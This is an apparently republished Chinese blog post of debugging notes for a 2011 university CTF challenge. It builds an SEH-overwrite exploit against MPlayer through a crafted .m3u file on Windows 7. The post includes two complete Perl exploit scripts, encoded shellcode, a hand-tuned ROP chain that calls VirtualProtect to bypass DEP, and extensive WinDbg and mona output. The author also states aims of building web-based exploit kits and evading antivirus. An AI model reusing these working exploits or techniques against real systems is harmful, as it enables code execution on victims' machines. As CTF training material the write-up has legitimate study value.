2011西安电子科技大学网络攻防大赛  漏洞挖掘题目 windows7 seh  exploit dep bypass 调试笔记

上次准备研究的网马利用方向:

1.如何快速开发绕过dep的网马exp
2. 解密分析一些效果很好的shellcode是如何写的比如不用下载执行的shellcode等
3.如何对抗杀软检测,
4. 分析如何利用Java和flash绕过windows7的ASLR和dep等

最近通过调试一个老的网马,亲自写exploit。实现了 xp sp3 ie6、ie7 ,xp sp3+ ie8 dep bypass的 cn tw en kr等版本以及windows7 + jre6 的绕过ASLR和dep的利用。通过这次调试经历基本掌握了流行网马的利用原理,还有些不是很清晰的地方要多参考经典文章多动手调试,下一步掌握。第3条也有所了解,一般是代码的互换加密,flash封装等。

对第2条,这个周末找个好shellcode跟一下。第4条,据说一些版本的flash中申请的内存是有执行权限的?回头研究一下。

既然windows 7 的环境都搭建好了,就把上次完成一半的windows7 seh dep bypass题目做完。把上次xp下的exp稍微一改。

#!/usr/bin/perl
# 2011西安电子科技大学网络攻防大赛  漏洞挖掘题目 seh exploit for windows7 dep bypass poc0
# by c4rp3nt3r@0x50sec.org
#
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc
my $load =
"/xba/xa3/xfd/xdd/x88/xd9/xf7/xd9/x74/x24/xf4/x5f/x31/xc9" .
"/xb1/x32/x31/x57/x12/x83/xef/xfc/x03/xf4/xf3/x3f/x7d/x06" .
"/xe3/x49/x7e/xf6/xf4/x29/xf6/x13/xc5/x7b/x6c/x50/x74/x4c" .
"/xe6/x34/x75/x27/xaa/xac/x0e/x45/x63/xc3/xa7/xe0/x55/xea" .
"/x38/xc5/x59/xa0/xfb/x47/x26/xba/x2f/xa8/x17/x75/x22/xa9" .
"/x50/x6b/xcd/xfb/x09/xe0/x7c/xec/x3e/xb4/xbc/x0d/x91/xb3" .
"/xfd/x75/x94/x03/x89/xcf/x97/x53/x22/x5b/xdf/x4b/x48/x03" .
"/xc0/x6a/x9d/x57/x3c/x25/xaa/xac/xb6/xb4/x7a/xfd/x37/x87" .
"/x42/x52/x06/x28/x4f/xaa/x4e/x8e/xb0/xd9/xa4/xed/x4d/xda" .
"/x7e/x8c/x89/x6f/x63/x36/x59/xd7/x47/xc7/x8e/x8e/x0c/xcb" .
"/x7b/xc4/x4b/xcf/x7a/x09/xe0/xeb/xf7/xac/x27/x7a/x43/x8b" .
"/xe3/x27/x17/xb2/xb2/x8d/xf6/xcb/xa5/x69/xa6/x69/xad/x9b" .
"/xb3/x08/xec/xf1/x42/x98/x8a/xbc/x45/xa2/x94/xee/x2d/x93" .
"/x1f/x61/x29/x2c/xca/xc6/xc5/x66/x57/x6e/x4e/x2f/x0d/x33" .
"/x13/xd0/xfb/x77/x2a/x53/x0e/x07/xc9/x4b/x7b/x02/x95/xcb" .
"/x97/x7e/x86/xb9/x97/x2d/xa7/xeb/xfb/xb0/x3b/x77/xfc";
$length = 5149 - length($load);
my $junk = "/x90" x $length;
my $nseh = "/xeb/x06/x90/x90";
my $seh = pack('V',0x6ad410b4);    #pop pop ret from avcodec-52.dll
my $pay = "/xe9/x0c/xff/xff/xff" ; # jmp back to shellcode
open($FH,">exp.m3u");
print $FH $junk.$load.$nseh.$seh.$pay."/r/n";
close($FH);

通过定位溢出点发现windows7 下异常处理结构的覆盖地址居然跟exp下不一样。如上是第5149后面的字节覆盖栈中的异常处理结构。

windbg附加上mplayer 。将上面生成的exp.m3u 拖入mplayer的界面。windbg在异常处理结构起作用前捕获到了异常。
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=90909090 ebx=0022ea84 ecx=0022e68c edx=0022e944 esi=90909091 edi=0022e944
eip=777158d4 esp=0022e678 ebp=0022e67c iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
ntdll!RtlInitAnsiStringEx+0x1f:
777158d4 8a10            mov     dl,byte ptr [eax]          ds:0023:90909090=??
查看异常处理结构成功被覆盖,我们对pop pop ret的地址下断点跟一下看看跟xp的有什么区别。
0:000> !exchain
0022ffc4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Users/Administrator/Desktop/mplayer/avcodec-52.dll -
avcodec_52+10b4 (6ad410b4)
Invalid exception stack at 909006eb
0:000> bp 6ad410b4
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Windows/system32/KERNELBASE.dll -

让被我们覆盖的异常处理结构处理异常,发现成功进入我们的pop pop ret的地址。
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=6ad410b4 esp=0022e290 ebp=0022e2b0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_52+0x10b4:
6ad410b4 5b              pop     ebx
0:000> t
eax=00000000 ebx=777071f9 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=6ad410b5 esp=0022e294 ebp=0022e2b0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_52+0x10b5:
6ad410b5 5d              pop     ebp
0:000> t
eax=00000000 ebx=777071f9 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=6ad410b6 esp=0022e298 ebp=0022e378 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_52+0x10b6:
6ad410b6 c3              ret

下面可以发现此时esp保存的地址就是我们的 eb 06 90 90
0:000> d esp
0022e298  c4 ff 22 00 94 e3 22 00-4c e3 22 00 c4 ff 22 00  ..”…”.L.”…”.
0022e2a8  0d 72 70 77 c4 ff 22 00-60 e3 22 00 cb 71 70 77  .rpw..”.`.”..qpw
0022e2b8  78 e3 22 00 c4 ff 22 00-94 e3 22 00 4c e3 22 00  x.”…”…”.L.”.
0022e2c8  b4 10 d4 6a 00 00 00 00-78 e3 22 00 c4 ff 22 00  …j….x.”…”.
0022e2d8  87 f9 6d 77 78 e3 22 00-c4 ff 22 00 94 e3 22 00  ..mwx.”…”…”.
0022e2e8  4c e3 22 00 b4 10 d4 6a-44 e9 22 00 78 e3 22 00  L.”….jD.”.x.”.
0022e2f8  91 90 90 90 00 00 00 00-00 00 00 00 00 00 00 00  …………….
0022e308  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  …………….
0:000> u 0022ffc4
0022ffc4 eb06            jmp     0022ffcc
0022ffc6 90              nop
0022ffc7 90              nop
0022ffc8 b410            mov     ah,10h
0022ffca d46a            aamb    6Ah
0022ffcc e90cffffff      jmp     0022fedd
0022ffd1 0000            add     byte ptr [eax],al
0022ffd3 00ec            add     ah,ch
0:000> t
eax=00000000 ebx=777071f9 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=0022ffc4 esp=0022e29c ebp=0022e378 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
0022ffc4 eb06            jmp     0022ffcc

继续运行的话已经出现访问错误了。因为dep开启的原因我们无法继续运行栈里的shellcode。
0:000> t
(e84.19c): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=777071f9 ecx=6ad410b4 edx=7770720d esi=00000000 edi=00000000
eip=0022ffc4 esp=0022e29c ebp=0022e378 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
0022ffc4 eb06            jmp     0022ffcc

下面我们使用rop的方式绕过dep。

seh处理异常时候先会把一些寄存器清零,所以我们没有发现有寄存器指向我们能控制的字符串。
我们先调整堆栈,使我们要布局的rop链能够顺利运行。
0:000> d esp+200
0022e49c  00 00 00 00 00 00 00 00-00 00 00 00 ff ff 00 00  …………….
0022e4ac  00 00 00 00 88 88 88 88-88 88 88 88 ff ff 00 00  …………….
0022e4bc  00 00 00 00 00 00 00 00-00 00 00 00 ff ff 00 00  …………….
0022e4cc  00 00 00 00 ff 00 ff 00-ff 00 ff 00 ff ff 00 00  …………….
0022e4dc  00 00 00 00 00 d0 cc cc-cc cc cc cc fb 3f 00 00  ………….?..
0022e4ec  00 00 00 00 00 00 00 00-00 00 00 a0 f7 3f 00 00  ………….?..
0022e4fc  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  …………….
0022e50c  00 00 00 00 97 53 22 5b-df 4b 48 03 c0 6a 9d 57  …..S”[.KH..j.W
0:000> d esp+500
0022e79c  00 00 c1 00 15 e1 6d 77-2a 1d 01 01 8c e7 22 00  ......mw*.....".
0022e7ac  c4 68 78 77 a4 e8 22 00-15 e1 6d 77 2a 1d 34 00  .hxw.."...mw*.4.
0022e7bc  fe ff ff ff c4 68 78 77-3e a1 74 77 00 00 c1 00  .....hxw>.tw....
0022e7cc  63 00 00 50 70 65 71 77-46 e8 67 77 01 00 00 00  c..PpeqwF.gw....
0022e7dc  00 00 00 00 1c e8 22 00-ba ea 95 75 59 04 00 00  ......"....uY...
0022e7ec  2a 00 00 00 00 01 00 00-df 82 95 75 00 00 00 00  *..........u....
0022e7fc  1c 00 fa 7f 00 00 00 00-05 e9 22 00 00 00 00 00  ..........".....
0022e80c  f5 f8 00 00 b4 e8 22 00-f2 70 71 77 a0 95 9f d3  ......"..pqw....
0:000> d esp+1000
0022f29c  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2ac  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2bc  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2cc  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2dc  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2ec  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f2fc  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
0022f30c  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................

发现esp+1000的地方出现了我们的shellcode
我们要找的一个地址 类似下面的代码  #add esp,1000 # retn。

找rop链接当然Corelan Team出品的神器 mona + ImmunityDebugger。

模块信息如下:
----------------------------------------------------------------------------------------------------------------------------------
Module info :
----------------------------------------------------------------------------------------------------------------------------------
Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
0x6a0d0000 | 0x6a105000 | 0x00035000 | True   | True    | True  |  True    | False  | 4.0.4 [unrar.dll] (C:/Users/Administrator/Desktop/mplayer_release/mplayer/unrar.dll)
0x73d10000 | 0x73d16000 | 0×00006000 | True   | True    | True  |  True    | True   | 6.1.7600.16385 [DCIMAN32.dll] (C:/Windows/system32/DCIMAN32.dll)
0x6ad40000 | 0x6b72e000 | 0x009ee000 | False  | False   | False |  False   | False  | -1.0- [avcodec-52.dll] (C:/Users/Administrator/Desktop/mplayer_release/mplayer/avcodec-52.dll)

我们使用avcodec-52.dll中的地址就能绕过 windows7 ASLR + DEP + SafeSEH的保护。
调试器附进程后运行 !mona rop -m avcodec-52.dll -n

在生成的文件stackpivot.txt找到

0x6afc7973 : {pivot 2204 / 0x89c} :  # ADD ESP,88C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-52.dll] **   |   {PAGE_EXECUTE_WRITECOPY}

测试时候发现.m3u文件会对一些特殊字符处理比如 0×23是 # 被用作注释 2e是点号也会被处理

0:000> !exchain
0022ffc4: *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Users/Administrator/Desktop/mplayer/avcodec-52.dll -
avcodec_52!ff_vorbis_floor1_render_list+2d33 (6afc7973)
Invalid exception stack at 43434343
0:000> bp 6afc7973
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Windows/system32/KERNELBASE.dll -
0:000> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6afc7973 edx=7770720d esi=00000000 edi=00000000
eip=6afc7973 esp=0022e290 ebp=0022e2b0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_52!ff_vorbis_floor1_render_list+0x2d33:
6afc7973 81c48c080000    add     esp,88Ch
0:000> u eip
avcodec_52!ff_vorbis_floor1_render_list+0x2d33:
6afc7973 81c48c080000    add     esp,88Ch
6afc7979 5b              pop     ebx
6afc797a 5e              pop     esi
6afc797b 5f              pop     edi
6afc797c 5d              pop     ebp
6afc797d c3              ret
6afc797e b801000000      mov     eax,1
6afc7983 ebee            jmp     avcodec_52!ff_vorbis_floor1_render_list+0x2d33 (6afc7973)
0:000> t
eax=00000000 ebx=00000000 ecx=6afc7973 edx=7770720d esi=00000000 edi=00000000
eip=6afc7979 esp=0022eb1c ebp=0022e2b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d39:
6afc7979 5b              pop     ebx
0:000>
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=00000000 edi=00000000
eip=6afc797a esp=0022eb20 ebp=0022e2b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d3a:
6afc797a 5e              pop     esi
0:000>
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=61326661 edi=00000000
eip=6afc797b esp=0022eb24 ebp=0022e2b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d3b:
6afc797b 5f              pop     edi
0:000>
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=61326661 edi=66613366
eip=6afc797c esp=0022eb28 ebp=0022e2b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d3c:
6afc797c 5d              pop     ebp
0:000>
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=61326661 edi=66613366
eip=6afc797d esp=0022eb2c ebp=35666134 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
avcodec_52!ff_vorbis_floor1_render_list+0x2d3d:
6afc797d c3              ret
0:000> d esp
0022eb2c  61 66 36 61 66 37 61 66-38 61 66 39 61 67 30 61  af6af7af8af9ag0a
0022eb3c  67 31 61 67 32 61 67 33-61 67 34 61 67 35 61 67  g1ag2ag3ag4ag5ag
0022eb4c  36 61 67 37 61 67 38 61-67 39 61 68 30 61 68 31  6ag7ag8ag9ah0ah1
0022eb5c  61 68 32 61 68 33 61 68-34 61 68 35 61 68 36 61  ah2ah3ah4ah5ah6a
0022eb6c  68 37 61 68 38 61 68 39-61 69 30 61 69 31 61 69  h7ah8ah9ai0ai1ai
0022eb7c  32 61 69 33 61 69 34 61-69 35 61 69 36 61 69 37  2ai3ai4ai5ai6ai7
0022eb8c  61 69 38 61 69 39 61 6a-30 61 6a 31 61 6a 32 61  ai8ai9aj0aj1aj2a
0022eb9c  6a 33 61 6a 34 61 6a 35-61 6a 36 00 6a 37 41 6a  j3aj4aj5aj6.j7Aj
0:000> t
eax=00000000 ebx=31666130 ecx=6afc7973 edx=7770720d esi=61326661 edi=66613366
eip=61366661 esp=0022eb30 ebp=35666134 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
61366661 ??              ???

找一下所在的位置:
root@scan:~# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb af6a
[*] No exact matches, looking for likely candidates…
发现我们生成的字符串里根本就没有af6a 。原因是程序把我们的字符给转换成小写字母了。并且长度似乎也不够,下面不远的地址出现了00字符。再往下看出现了原始的大写字母。
0:000> d esp
0022eb30  66 37 61 66 38 61 66 39-61 67 30 61 67 31 61 67  f7af8af9ag0ag1ag
0022eb40  32 61 67 33 61 67 34 61-67 35 61 67 36 61 67 37  2ag3ag4ag5ag6ag7
0022eb50  61 67 38 61 67 39 61 68-30 61 68 31 61 68 32 61  ag8ag9ah0ah1ah2a
0022eb60  68 33 61 68 34 61 68 35-61 68 36 61 68 37 61 68  h3ah4ah5ah6ah7ah
0022eb70  38 61 68 39 61 69 30 61-69 31 61 69 32 61 69 33  8ah9ai0ai1ai2ai3
0022eb80  61 69 34 61 69 35 61 69-36 61 69 37 61 69 38 61  ai4ai5ai6ai7ai8a
0022eb90  69 39 61 6a 30 61 6a 31-61 6a 32 61 6a 33 61 6a  i9aj0aj1aj2aj3aj
0022eba0  34 61 6a 35 61 6a 36 00-6a 37 41 6a 38 41 6a 39  4aj5aj6.j7Aj8Aj9
0:000> d
0022ebb0  41 6b 30 41 6b 31 41 6b-32 41 6b 33 41 6b 34 41  Ak0Ak1Ak2Ak3Ak4A
0022ebc0  6b 35 41 6b 36 41 6b 37-41 6b 38 41 6b 39 41 6c  k5Ak6Ak7Ak8Ak9Al
0022ebd0  30 41 6c 31 41 6c 32 41-6c 33 41 6c 34 41 6c 35  0Al1Al2Al3Al4Al5
0022ebe0  41 6c 36 41 6c 37 41 6c-38 41 6c 39 41 6d 30 41  Al6Al7Al8Al9Am0A
0022ebf0  6d 31 41 6d 32 41 6d 33-41 6d 34 41 6d 35 41 6d  m1Am2Am3Am4Am5Am
0022ec00  36 41 6d 37 41 6d 38 41-6d 39 41 6e 30 41 6e 31  6Am7Am8Am9An0An1
0022ec10  41 6e 32 41 6e 33 41 6e-34 41 6e 35 41 6e 36 41  An2An3An4An5An6A
0022ec20  6e 37 41 6e 38 41 6e 39-41 6f 30 41 6f 31 41 6f  n7An8An9Ao0Ao1Ao
0:000>
0022ec30  32 41 6f 33 41 6f 34 41-6f 35 41 6f 36 41 6f 37  2Ao3Ao4Ao5Ao6Ao7
0022ec40  41 6f 38 41 6f 39 41 70-30 41 70 31 41 70 32 41  Ao8Ao9Ap0Ap1Ap2A
0022ec50  70 33 41 70 34 41 70 35-41 70 36 41 70 37 41 70  p3Ap4Ap5Ap6Ap7Ap
0022ec60  38 41 70 39 41 71 30 41-71 31 41 71 32 41 71 33  8Ap9Aq0Aq1Aq2Aq3
0022ec70  41 71 34 41 71 35 41 71-36 41 71 37 41 71 38 41  Aq4Aq5Aq6Aq7Aq8A
0022ec80  71 39 41 72 30 41 72 31-41 72 32 41 72 00 41 72  q9Ar0Ar1Ar2Ar.Ar
0022ec90  34 41 72 35 41 72 36 41-72 37 41 72 38 41 72 39  4Ar5Ar6Ar7Ar8Ar9
0022eca0  41 73 30 41 73 31 41 73-32 41 73 33 41 73 34 41  As0As1As2As3As4A

上面可以看到长度也足够容纳 rop链和shellcode。我们只要再把esp往上移一些就可以了,也不用太精确。

再找一个大点的

my $seh = pack(‘V’,0x6af51dc2 );

按照上面的方法定位下调整后后的esp在字符串中的偏移量
root@scan:~# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb 0Gb1
[*] Exact match at offset 4712

到现在为止我们的exp结构应该是这样的

[junk 4712字节] [rop链][jmp esp address][shellcode][junk加上前面总共 5149字节] [nseh 垃圾填充] [ 0x6af51dc2调整堆栈]

好了现在开始打造我们的rop链接。
找到刚刚
!mona rop -m avcodec-52.dll -n
生成的的rop_chains.txt

Register setup for VirtualProtect() :
——————————————–
EAX = NOP (0×90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0×40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
— alternative chain —
EAX = tr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0×40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to “jmp esp” on stack, below PUSHAD

……
ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
*** [ Python ] ***

def create_rop_chain():
# rop chain generated with mona.py – www.corelan.be
rop_gadgets = “”
rop_gadgets += struct.pack(‘<L’,0×00000000)  # [-] Unable to find API pointer -> eax
rop_gadgets += struct.pack(‘<L’,0x6ae8f378)  # MOV EAX,DWORD PTR DS:[EAX] # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6afda261)  # XCHG EAX,ESI # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6ae27a6d)  # POP EBP # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6afae347)  # & jmp esp [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6b028274)  # POP EAX # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0xfffffdff)  # Value to negate, will become 0×00000201
rop_gadgets += struct.pack(‘<L’,0x6b0ce791)  # NEG EAX # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6b01e85e)  # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0×41414141)  # Filler (compensate)
rop_gadgets += struct.pack(‘<L’,0×41414141)  # Filler (compensate)
rop_gadgets += struct.pack(‘<L’,0x6b028274)  # POP EAX # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0xffffffc0)  # Value to negate, will become 0×00000040
rop_gadgets += struct.pack(‘<L’,0x6b0ce791)  # NEG EAX # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6ae63239)  # XCHG EAX,EDX # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6aed7baf)  # POP ECX # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6b71ba09)  # &Writable location [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6b0308b8)  # POP EDI # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6b059081)  # RETN (ROP NOP) [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0x6b02836d)  # POP EAX # RETN [avcodec-52.dll]
rop_gadgets += struct.pack(‘<L’,0×90909090)  # nop
rop_gadgets += struct.pack(‘<L’,0x6ad7a043)  # PUSHAD # RETN [avcodec-52.dll]

上面的rop链接是个半成品,需要我们手动调整一下。使用第一种方式来做rop.

my     $rop_gadgets = pack(‘V’,0x6aee6245); # POP EBP # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x6aee6245); #  Filler (compensate)
$rop_gadgets .= pack(‘V’,0x6adc122d); # POP EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0xfffffdff); # Value to negate, will become 0×00000201
$rop_gadgets .= pack(‘V’,0x6b0ce791); # NEG EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x6adb16a5); # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x77b52c15); # ptr to &VirtualProtect() kernel32 //硬编码
$rop_gadgets .= pack(‘V’,0×41414141); # Filler (compensate)
$rop_gadgets .= pack(‘V’,0x6b02836d); # POP EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0xffffffc0); # Value to negate, will become 0×00000040
$rop_gadgets .= pack(‘V’,0x6b0ce791); # NEG EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x6ae63239); # XCHG EAX,EDX # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x6af63467); # POP ECX # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x6b19add4); # &Writable location [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x6b026a8c); # POP EDI # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x6b05908b); # RETN (ROP NOP) [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x6b028274); # POP EAX # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0×90909090); # nop
$rop_gadgets .= pack(‘V’,0x6b0665a2); # PUSHAD # RETN [avcodec-52.dll]
$rop_gadgets .= pack(‘V’,0x6afae368); # & jmp esp [avcodec-52.dll]

其实还是比较简单的就是 edi 放一个ret指令。esi放VirtualProtect的地址。程序返回时候VirtualProtect,调整堆栈esp指向 eax内的垃圾数据,返回地址是放到ebp里的,执行POP EBP # RETN 弹出eax的垃圾数据执行jmp esp,进入到我们的shellcode.

到这里,上面进行的还算顺利。我们的任务貌似就完成了,除了一个VirtualProtect()受到ASLR的影响外(题目没有要求要绕过ASLR),不过最恶心的是shellcode,我们的shellcode总是有几个字符被转换。查找坏字符用!mona的compare功能。最后还是比较恶心,对一道竞赛题目,我主要是练习seh bypass dep.我觉得我达到一定目的了就自己手动写了个硬编码执行calc的shellcode.
my $payload = “/x33/xc0″.  # xor eax,eax
“/x50″.                   # push eax
“/x68/x63/x61/x6c/x63″.      # push calc
“/x8b/xdc”.            #mov ebx,esp
“/x40″.                #inc eax
“/x50″.                # push eax
“/x53″.                #push ebx
“/xb8/xae/xed/xb9/x77″.  # mov eax,WinExeC
“/xff/xd0″;            # call eax

poc如下 ,如果你也是初学者,想成功运行这个poc。VirtualProtect()函数的地址和,WinExeC的地址都需要调整。

#!/usr/bin/perl
# 2011西安电子科技大学网络攻防大赛  漏洞挖掘题目 seh for windows7 dep bypass poc
# by c4rp3nt3r@0x50sec.org
#
#shellcode WinExec calc.exe
my $payload = "/x33/xc0".  # xor eax,eax
"/x50".                   # push eax
"/x68/x63/x61/x6c/x63".      # push calc
"/x8b/xdc".            #mov ebx,esp
"/x40".                #inc eax
"/x50".                # push eax
"/x53".                #push ebx
"/xb8/xae/xed/xb9/x77".  # mov eax,WinExeC
"/xff/xd0";            # call eax
#junk /opt/metasploit/apps/pro/msf3/tools/pattern_create.rb 5149
my     $rop_gadgets = pack('V',0x6aee6245); # POP EBP # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x6aee6245); # POP EBP # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x6adc122d); # POP EAX # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0xfffffdff); # Value to negate, will become 0x00000201
    $rop_gadgets .= pack('V',0x6b0ce791); # NEG EAX # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x6adb16a5); # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x77b52c15); # ptr to &VirtualProtect() kernel32 //硬编码
    $rop_gadgets .= pack('V',0x41414141); # Filler (compensate)
    $rop_gadgets .= pack('V',0x6b02836d); # POP EAX # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0xffffffc0); # Value to negate, will become 0x00000040
    $rop_gadgets .= pack('V',0x6b0ce791); # NEG EAX # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x6ae63239); # XCHG EAX,EDX # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x6af63467); # POP ECX # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x6b19add4); # &Writable location [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x6b026a8c); # POP EDI # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x6b05908b); # RETN (ROP NOP) [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x6b028274); # POP EAX # RETN [avcodec-52.dll]
    $rop_gadgets .= pack('V',0x90909090); # nop
    $rop_gadgets .= pack('V',0x6b0665a2); # PUSHAD # RETN [avcodec-52.dll]
      $rop_gadgets .= pack('V',0x6afae368); # & jmp esp [avcodec-52.dll]  
$junk = "/x90" x 5149;
$length = 5149 -  4712 -length($rop_gadgets) -length($payload);
print $length;
my $junk1 = substr($junk,0,4712);
my $junk2 = substr($junk,0, 5149 -  4712 -length($rop_gadgets) -length($payload));
my $nseh = "CCCC";
my $seh = pack('V',0x6af51dc2 );    ## ADD ESP,xxxx调整堆栈for stackpivot
open($FH,">exp2.m3u");
print $FH $junk1.$rop_gadgets.$payload.$junk2.$nseh.$seh."/r/n";
#print $FH $junk.$nseh.$seh."/r/n";
close($FH);

 

2011西安电子科技大学网络攻防大赛  漏洞挖掘题目 windows7 seh dep bypass 调试笔记

rop链执行后顺利进入了jmp esp的指令,此时esp正好指向我们的shellcode。

2011西安电子科技大学网络攻防大赛  漏洞挖掘题目 windows7 seh dep bypass 调试笔记

终于出现了可爱的calc.exe
总结通过调试windows7 下的dep绕过感觉单单的dep容易被打败,ASRL+DEP还是比较难的。windows7 的网马对于装了java6就相当与ASRL失效,msf的很多网马都是利用java6相关模块没启用aslr来打windows7的,这样的话xp+ie8跟windows7+ie8几乎没什么差别,只是堆喷射的时候稍微注意就好了。虽然不完美还是有收获,之前认为很可怕的东西原来没那么可怕。自己一个人摸索进步还是很慢,要更加继续努力才行!

该文章由WP-AutoPost插件自动采集发布

原文地址:http://bluereader.org/article/30418820